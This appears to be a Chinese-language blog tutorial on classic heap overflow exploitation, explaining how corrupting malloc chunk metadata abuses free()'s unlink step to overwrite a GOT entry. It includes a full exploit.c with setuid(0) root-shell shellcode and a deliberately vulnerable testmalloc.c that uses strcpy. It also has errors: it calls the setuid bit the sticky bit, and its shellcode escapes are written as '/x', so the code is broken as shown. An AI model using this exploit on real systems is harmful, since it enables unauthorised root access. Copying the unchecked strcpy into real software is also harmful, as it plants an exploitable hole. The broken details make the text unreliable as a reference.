学步园

Heap overflow是一种系统提升权限的方法。在Linux系统中，入侵者可以针对某些文件属性设置成+rws（也就是传说中的
粘滞位）的漏洞程序进行攻击从而得到root权限。我们在模拟攻击时可以在root权限下使用以下命令来设置粘滞位属性:

                             chown root:root xxx

                             chmod +s xxx

其中xxx代表我们要攻击的文件。

Heap Overflow的原理是修改程序中的GOT（Global Offest Table）表来使得程序调用正规函数时(如printf() free()等)跳入我们设计的shellcode。在这一点上它的手段类似于Format String Attack都是利用修改内存来达到攻击的目的。Heap Overflow的优点是一次运行基本搞定，不像stack overflow还可能需要猜多次栈的偏移，

如何能够任意修改内存呢？Heap Overflow攻击利用了内存释放函数free的一个特性。利用了我们当调用free释放一个内存空间时，free函数内存将会查看在堆中下一个内存是否也已经释放。如果是的话，那么程序将执行一个Unlink宏将两个内存空间结合起来，这样的话能够减少堆中的内存碎片从而提高程序的效率。

Unlink宏的执行方式类似于双向链表中删除其中某一个元素的操作。也就是将前一个元素的后指针指向当前的后指针，后一个元素的前指针指向当前的前指针。我们要注意到，这其实是两个内存赋值操作，本质上就是两个类似于*ptr = data的操作。而如果我们设计的字符串够长到足以能够修改到以上ptr和data的值的话，我们其实就能够修改程序内任意内存地址的值，包括以上提到的GOT表，从而改变让程序跳入我们设计的shellcode。

要完成Heap Overflow，有几点需要注意：

1. 计算堆的大小

堆得大小和分配的大小不一样，我们要多分配4byte来保存这个堆的大小，而堆的大小又必须是8的倍数，所以堆得实际大小的计算方法是：

actual_size = floor((memory_size + 4)/8) * 8, 其中floor()是上取整操作。

2. 修改使得第二个内存"看起来"已经被释放过

这可以通过首先设置第二个内存大小为-4，然后再将内存上一个byte的值设置为一个偶数来完成

3. 修改GOT表

这实际上相当于一个一个内存赋值问题

*(GOT_Table_Addr + 12) = shellcode_address

GOT表中某函数的位置可以通过objdump -R来查看

4. 准备邪恶的shellcode

由于我们准备将shellcode放在堆中，而且用空指令NOP来铺路，shellcode的地址其实就可以是堆起始地址后偏移任意位（貌似大于8bytes就可以）。这里我们可以用ltrace命令来查看某内存在堆中的地址。

好了，这样我们就成功的准备了一个heap overflow程序。具体代码如下：

exploit.c

#include <stdio.h><br /> #define NOP 0x90<br /> #define MEM_SZ 200 /* 这里填要溢出的堆的大小 */<br /> #define PTR_ADDR 0x8049668 /* 这里填ltrace得到的值 */<br /> #define FREE_ADDR 0x8049608 /* 这里填objdump得到的值 */<br /> /* 传说中的shellcode汇编16进制码，其实就是相当于执行个root权限的shell*/<br /> char shellcode[] = "/x31/xdb/x89/xd8/xb0/x17/xcd/x80" /*setuid(0) */<br /> "/xeb/x1f/x5e/x89/x76/x08/x31/xc0/x88/x46/x07/x89/x46/x0c/xb0/x0b"<br /> "/x89/xf3/x8d/x4e/x08/x8d/x56/x0c/xcd/x80/x31/xdb/x89/xd8/x40/xcd"<br /> "/x80/xe8/xdc/xff/xff/xff/bin/sh";<br /> int main()<br /> {<br /> char* inject_buf;<br /> int actual_size, inject_size;<br /> int *p;</p> <p> actual_size = 8 * ((MEM_SZ + 4) / 8 + 1);</p> <p> inject_size = actual_size - 4 + 12 + 1;<br /> inject_buf = malloc(inject_size);<br /> memset(inject_buf, NOP, inject_size);<br /> memcpy(inject_buf + 12, shellcode, strlen(shellcode));<br /> p = inject_buf + actual_size - 4;<br /> *p = -4;<br /> *(p - 1) = *(p - 1) & ~0x01;<br /> *(p + 1) = FREE_ADDR - 12;<br /> *(p + 2) = PTR_ADDR + 8;</p> <p> inject_buf[inject_size - 1] = '/0';</p> <p> execl("./testmalloc", "testmalloc", inject_buf, NULL);</p> <p> free(inject_buf);</p> <p> return 0;<br /> }

testmalloc.c

#include <stdlib.h><br /> #include <string.h><br /> int main( int argc, char * argv[] )<br /> {<br /> char * first, * second;<br /> first = malloc( 200 );<br /> second = malloc( 12 );<br /> /* 万恶的strcpy */<br /> strcpy( first, argv[1] );<br /> free( first );<br /> free( second );</p> <p> return( 0 );<br /> }

具体细节可以参考Smashing The Heap For Fun And Profit (by Michel "MaXX" Kaempf)